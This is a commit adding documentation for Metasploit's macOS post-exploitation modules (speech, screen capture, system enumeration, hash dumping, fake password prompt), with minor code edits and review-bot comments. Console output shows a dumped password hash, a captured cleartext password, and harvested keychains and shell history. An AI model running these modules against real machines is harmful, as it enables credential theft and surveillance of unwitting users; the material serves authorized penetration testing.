osx docs and cleanup

master
h00die 2019-04-15 21:01:05 -04:00
parent f41a90a582
commit 621c7182bf
9 changed files with 387 additions and 5 deletions

@ -0,0 +1,85 @@
## Vulnerable Application
This module will speak whatever is in the 'TEXT' option on the victim machine.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/admin/say```
4. Do: ```run```
5. You should hear 'metasploit' through the speakers
## Options
**TEXT**
The text that should be read. Default is `meta-sploit!`.
**VOICE**
The voice to use. Default is `alex`.
This can be obtained on the system by specifying `-v ?` (example from 10.14.4):
```
say -v ?
Alex en_US # Most people recognize me by my voice.
Alice it_IT # Salve, mi chiamo Alice e sono una voce italiana.
Alva sv_SE # Hej, jag heter Alva. Jag är en svensk röst.
Amelie fr_CA # Bonjour, je mappelle Amelie. Je suis une voix canadienne.
Anna de_DE # Hallo, ich heiße Anna und ich bin eine deutsche Stimme.
Carmit he_IL # שלום. קוראים לי כרמית, ואני קול בשפה העברית.
Damayanti id_ID # Halo, nama saya Damayanti. Saya berbahasa Indonesia.
Daniel en_GB # Hello, my name is Daniel. I am a British-English voice.
Diego es_AR # Hola, me llamo Diego y soy una voz española.
Ellen nl_BE # Hallo, mijn naam is Ellen. Ik ben een Belgische stem.
Fiona en-scotland # Hello, my name is Fiona. I am a Scottish-English voice.
Fred en_US # I sure like being inside this fancy computer
Ioana ro_RO # Bună, mă cheamă Ioana . Sunt o voce românească.
Joana pt_PT # Olá, chamo-me Joana e dou voz ao português falado em Portugal.
Jorge es_ES # Hola, me llamo Jorge y soy una voz española.
Juan es_MX # Hola, me llamo Juan y soy una voz mexicana.
Kanya th_TH # สวัสดีค่ะ ดิฉันชื่อKanya
Karen en_AU # Hello, my name is Karen. I am an Australian-English voice.
Kyoko ja_JP # こんにちは、私の名前はKyokoです。日本語の音声をお届けします。
Laura sk_SK # Ahoj. Volám sa Laura . Som hlas v slovenskom jazyku.
Lekha hi_IN # नमस्कार, मेरा नाम लेखा है. मैं हिन्दी में बोलने वाली आवाज़ हूँ.
Luca it_IT # Salve, mi chiamo Luca e sono una voce italiana.
Luciana pt_BR # Olá, o meu nome é Luciana e a minha voz corresponde ao português que é falado no Brasil
Maged ar_SA # مرحبًا اسمي Maged. أنا عربي من السعودية.
Mariska hu_HU # Üdvözlöm! Mariska vagyok. Én vagyok a magyar hang.
Mei-Jia zh_TW # 您好,我叫美佳。我說國語。
Melina el_GR # Γεια σας, ονομάζομαι Melina. Είμαι μια ελληνική φωνή.
Milena ru_RU # Здравствуйте, меня зовут Milena. Я русский голос системы.
Moira en_IE # Hello, my name is Moira. I am an Irish-English voice.
Monica es_ES # Hola, me llamo Monica y soy una voz española.
Nora nb_NO # Hei, jeg heter Nora. Jeg er en norsk stemme.
Paulina es_MX # Hola, me llamo Paulina y soy una voz mexicana.
Samantha en_US # Hello, my name is Samantha. I am an American-English voice.
Sara da_DK # Hej, jeg hedder Sara. Jeg er en dansk stemme.
Satu fi_FI # Hei, minun nimeni on Satu. Olen suomalainen ääni.
Sin-ji zh_HK # 您好,我叫 Sin-ji。我講廣東話。
Tessa en_ZA # Hello, my name is Tessa. I am a South African-English voice.
Thomas fr_FR # Bonjour, je mappelle Thomas. Je suis une voix française.
Ting-Ting zh_CN # 您好我叫Ting-Ting。我讲中文普通话。
Veena en_IN # Hello, my name is Veena. I am an Indian-English voice.
Victoria en_US # Isn't it nice to have a computer that will talk to you?
Xander nl_NL # Hallo, mijn naam is Xander. Ik ben een Nederlandse stem.
Yelda tr_TR # Merhaba, benim adım Yelda. Ben Türkçe bir sesim.
Yuna ko_KR # 안녕하세요. 제 이름은 Yuna입니다. 저는 한국어 음성입니다.
Yuri ru_RU # Здравствуйте, меня зовут Yuri. Я русский голос системы.
Zosia pl_PL # Witaj. Mam na imię Zosia, jestem głosem kobiecym dla języka polskiego.
Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas.
```
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say
msf5 post(osx/admin/say) > set session 1
session => 1
msf5 post(osx/admin/say) > run
[*] Post module execution completed
```
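
Review bot: The Verification Steps in this file go straight from `use post/osx/admin/say` to `run` with no `set session #` step, while the scenario at the bottom sets `session 1` and the other documentation files in this commit list that step; add it as step 4. Step 5 also says you should hear 'metasploit' although the TEXT default is documented as `meta-sploit!`. The full `say -v ?` listing could be cut to a few sample lines, since the set of voices differs per OS version.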

@ -0,0 +1,53 @@
## Vulnerable Application
This module takes screenshots of target desktop and automatically downloads them.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/capture/screen```
5. Do: ```set session #```
5. Do: ```run```
6. You should have a screenshot saved to loot
## Options
**COUNT**
The number of screenshots to collect. Default is `1`.
**DELAY**
Interval between screenshots in seconds. 0 for no delay. Default is `10`.
**EXE_PATH**
Path to remote screencapture executable. Default is `/usr/sbin/screencapture`
**FILETYPE**
File format to use when saving a snapshot (Accepted: png, gif). Default is `png`.
**TMP_PATH**
Path to remote temp directory. Default is `/tmp/<random>`
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run
[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
222.222.2.222 screen_capture.screenshot screenshot.0.png image/png Screenshot /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png
```
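
Review bot: The Verification Steps list is numbered 1, 2, 3, 5, 5, 6; the line `5. Do: set session #` should be step 4. In Options, the EXE_PATH and TMP_PATH defaults are missing the closing period that COUNT, DELAY and FILETYPE have.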

@ -0,0 +1,120 @@
## Vulnerable Application
This module gathers basic system information from Mac OS X Tiger (10.4), through Mojave (10.14).
The following information is enumerated:
1. OS
2. Network
3. Bluetooth
4. Ethernet
5. Printers
6. USB
7. Airport
8. Firewall
9. Known Networks
10. Applications
11. Development Tools
12. Frameworks
13. Logs
14. Preference Panes
15. StartUp
16. TCP/UDP Connections
17. Environment Variables
18. Last Boottime
19. Current Activity
20. Process List
21. Users & Groups
22. User history files (`.bash_history`)
23. User keychains (downloaded as well)
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/gather/enum_osx```
4. Do: ```set session #```
5. Do: ```run```
6. You should have lots of files saved to the logs folder
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 > use post/osx/gather/enum_osx
msf5 post(osx/gather/enum_osx) > show options
Module options (post/osx/gather/enum_osx):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(osx/gather/enum_osx) > set session 1
session => 1
msf5 post(osx/gather/enum_osx) > run
[*] Running module against MacBook-Pro.nogroup
[*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] Enumerating OS
[*] Enumerating Network
[*] Enumerating Bluetooth
[*] Enumerating Ethernet
[*] Enumerating Printers
[*] Enumerating USB
[*] Enumerating Airport
[*] Enumerating Firewall
[*] Enumerating Known Networks
[*] Enumerating Applications
[*] Enumerating Development Tools
[*] Enumerating Frameworks
[*] Enumerating Logs
[*] Enumerating Preference Panes
[*] Enumerating StartUp
[*] Enumerating TCP Connections
[*] Enumerating UDP Connections
[*] Enumerating Environment Variables
[*] Enumerating Last Boottime
[*] Enumerating Current Activity
[*] Enumerating Process List
[*] Enumerating Users
[*] Enumerating Groups
[*] Extracting history files
[*] History file .bash_history found for h00die
[*] Downloading .bash_history
[*] Enumerating and Downloading keychains for h00die
[*] Post module execution completed
msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
total 1.4M
drwxr-xr-x 2 root root 4.0K Apr 15 07:58 .
drwxr-xr-x 3 root root 4.0K Apr 15 07:57 ..
-rw-r--r-- 1 root root 4.2K Apr 15 07:57 Airport.txt
-rw-r--r-- 1 root root 87K Apr 15 07:57 Applications.txt
-rw-r--r-- 1 root root 3.5K Apr 15 07:57 Bluetooth.txt
-rw-r--r-- 1 root root 64 Apr 15 07:58 Current Activity.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Development Tools.txt
-rw-r--r-- 1 root root 308 Apr 15 07:58 Environment Variables.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Ethernet.txt
-rw-r--r-- 1 root root 129 Apr 15 07:57 Firewall.txt
-rw-r--r-- 1 root root 316K Apr 15 07:58 Frameworks.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Groups.txt
-rw-r--r-- 1 root root 414 Apr 15 07:58 h00die_.bash_history.txt
-rw-r--r-- 1 root root 63 Apr 15 07:58 h00die_bash__line_342__usr_bin_security__No_such_file_or_directory
-rw-r--r-- 1 root root 1.3K Apr 15 07:57 Known Networks.txt
-rw-r--r-- 1 root root 32 Apr 15 07:58 Last Boottime.txt
-rw-r--r-- 1 root root 841K Apr 15 07:58 Logs.txt
-rw-r--r-- 1 root root 2.1K Apr 15 07:57 Network.txt
-rw-r--r-- 1 root root 364 Apr 15 07:57 OS.txt
-rw-r--r-- 1 root root 8.8K Apr 15 07:58 Preference Panes.txt
-rw-r--r-- 1 root root 204 Apr 15 07:57 Printers.txt
-rw-r--r-- 1 root root 34K Apr 15 07:58 Process List.txt
-rw-r--r-- 1 root root 0 Apr 15 07:58 StartUp.txt
-rw-r--r-- 1 root root 739 Apr 15 07:58 TCP Connections.txt
-rw-r--r-- 1 root root 4.1K Apr 15 07:58 UDP Connections.txt
-rw-r--r-- 1 root root 1.7K Apr 15 07:57 USB.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Users.txt
```
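
Review bot: The scenario's directory listing includes `h00die_bash__line_342__usr_bin_security__No_such_file_or_directory` (63 bytes), which looks like a shell error message used as a file name rather than a downloaded keychain, so item 23, "User keychains (downloaded as well)", is not demonstrated by this 10.14.4 run. Either note that limitation under the scenario or fix the keychain step before the documentation claims it works through Mojave.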

@ -0,0 +1,45 @@
## Vulnerable Application
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.
## Verification Steps
1. Start msfconsole
2. Get a root privileged shell
3. Do: ```use post/osx/gather/hashdump```
4. Do: ```set session #```
5. Do: ```run```
6. You should see hashes dumped and stored to creds (if db is connected)
## Options
**MATCHUSER**
A regex to run against usernames. Only matched usernames will have their hashes dumped.
## Scenarios
### User level shell on OSX 10.14.4
```
msf5 post(osx/gather/hashdump) > run
[-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes
[*] Post module execution completed
```
### Root level shell on OSX 10.14.4
```
msf5 post(osx/gather/hashdump) > run
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user h00die...
[+] SHA-512 PBKDF2:h00die:$ml$67012$52a3da29923ab1680ae7c28b40a3ba7c2386c679af0392011f706c4ec2a22475$5c935f59a173d25bd4ed5cf59464930153198ea28b70d1e4bb5fe5e39828bec8347419dc53f0f0d93f08399f30b56adcd0f9a6f6e834ba33cba58d6b35fd1021bd81e63edf2a5b2265d8c4b7908d9bcfe127cbcd3c2092d2ab58f1b7a16dc3e11e0d5a7b027c254f3f91fdeb5acc92bcf5a3cc033319f5209f635c0494854a2e
[*] Credential saved in database.
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Post module execution completed
```
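
Review bot: The root-level scenario prints a complete `SHA-512 PBKDF2` hash for user `h00die`; if that came from a real account, replace it with output from a throwaway test user or a truncated value before merging. In the same output `nobody`, `root` and `daemon` are each attempted twice, which deserves either a sentence of explanation or a check for duplicate entries in the module's user list.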

@ -0,0 +1,79 @@
## Vulnerable Application
Presents a password prompt dialog to a logged-in OSX user. Depending on the version of OSX, additional steps may be necessary to
allow permission for the prompt to be displayed. See Scenarios for additional details.
## Verification Steps
1. Start msfconsole
2. Get a shell, user level is fine.
3. Do: ```use post/osx/gather/password_prompt_spoof```
4. Do: ```set session #```
5. Do: ```run```
6. The user will be prompted to enter their password, or complete additional steps.
## Options
**BUNDLEPATH**
Path to bundle containing icon. Default is `/System/Library/CoreServices/CoreTypes.bundle`.
**ICONFILE**
Icon filename relative to bundle. Default is `UserUnknownIcon.icns`
**TEXTCREDS**
Text displayed when asking for a password. Default is `Type your password to allow System Preferences to make changes`.
**TIMEOUT**
Timeout for user to enter credentails. Default is `60`. Newer versions of OSX may require additional time due to user interaction.
## Scenarios
### User level shell on OSX 10.14.4
If the user does not complete the prompt in time, or does not enable permissions to receive the prompt:
```
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Timeout period expired before credentials were entered!
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti
[*] Post module execution completed
```
If the user DOES complete the prompt in time:
```
msf5 post(osx/gather/password_prompt_spoof) > run
[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Password entered! What a nice compliant user...
[+] password file contents: 20190415_122536:h00die:alfalfasprouts!
[+] Password data stored as loot in: /loot/20190415122537_default_192.168.2.225_password_355107.txt
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.jJATztdro
[*] Post module execution completed
```
#### User Experience
The following screen shots are from OSX 10.14.4 from a `ssh_login` shell as the user. Executable may change depending on the shell type and user permissions.
The user is first prompts for additional permissions (System Events):
<img width="423" alt="Screen Shot 2019-04-15 at 12 19 38 PM" src="https://user-images.githubusercontent.com/752491/56173728-ead79c80-5fbc-11e9-8a8f-3b3265220c95.png">
Next, the user is prompted to allow Accessibility Access (Events):
<img width="463" alt="Screen Shot 2019-04-15 at 12 20 08 PM" src="https://user-images.githubusercontent.com/752491/56173737-f4f99b00-5fbc-11e9-9dcc-efbfe0cd08eb.png">
Clicking Open System Preferences shows the executable asking for the permissions. The screenshot was taken after clicking the lock in the bottom left corner,
and checking `sshd-keygen-wrapper`:
<img width="670" alt="Screen Shot 2019-04-15 at 12 24 27 PM" src="https://user-images.githubusercontent.com/752491/56173742-fa56e580-5fbc-11e9-8d28-5669e9e9448f.png">
Finally, if done within the `TIMEOUT` (or with all required permissions):
<img width="424" alt="Screen Shot 2019-04-15 at 12 25 25 PM" src="https://user-images.githubusercontent.com/752491/56173748-fe830300-5fbc-11e9-9564-0e7137b051a8.png">
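
Review bot: Two typos in this file: `credentails` in the TIMEOUT option should be `credentials`, and "The user is first prompts for additional permissions" should read "prompted". The second scenario also shows a cleartext password on the `password file contents` line; confirm it is a test value. The four screenshots are hotlinked from user-images.githubusercontent.com, so the User Experience section depends on those URLs staying available.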

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
[ true, 'The time between transferring log chunks.', 10 ]
),
OptPort.new('LOGPORT',
[ false, 'Local port opened for momentarily for log transfer', 22899 ]
[ false, 'Local port opened momentarily for log transfer', 22899 ]
)
]
)

@ -14,8 +14,8 @@ class MetasploitModule < Msf::Post
super( update_info( info,
'Name' => 'OS X Gather Mac OS X System Information Enumeration',
'Description' => %q{
This module gathers basic system information from Mac OS X Tiger, Leopard,
Snow Leopard and Lion systems.
This module gathers basic system information from Mac OS X Tiger (10.4), through
Mojave (10.14).
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
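
Review bot: The new description has a stray comma: "Tiger (10.4), through Mojave (10.14)" should be "Tiger (10.4) through Mojave (10.14)". The same sentence is copied into the enum_osx documentation added by this commit, so fix it in both places.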

@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post
'Name' => 'OS X Gather Mac OS X Password Hash Collector',
'Description' => %q{
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports
versions 10.3 to 10.9.
versions 10.3 to 10.14.
},
'License' => MSF_LICENSE,
'Author' => [
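
Review bot: The upper bound moves from 10.9 to 10.14, but the only run shown in this commit is on 10.14.4, and its output is labelled `SHA-512 PBKDF2`, a format that the description's list "SHA-1, LM, NT, and SHA-512" does not name. Consider naming PBKDF2 in the description and stating which versions between 10.9 and 10.14 were actually tested.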

@ -110,7 +110,7 @@ class MetasploitModule < Msf::Post
print_status("Timeout period expired before credentials were entered!")
end
print_status("Cleaning up files in #{host}:#{dir}")
print_status("Cleaning up files in #{host}: #{dir}")
cmd_exec("/usr/bin/srm -rf #{dir}")
end
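
Review bot: The new message adds a space after the colon (`#{host}: #{dir}`), but the scenario output in the password_prompt_spoof documentation added by this same commit still shows the old form, `Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti`; regenerate that output or keep the message as it was. In the unchanged context line, `dir` is interpolated unquoted into `cmd_exec("/usr/bin/srm -rf #{dir}")`, so quote or escape it if the value can ever contain spaces or shell metacharacters.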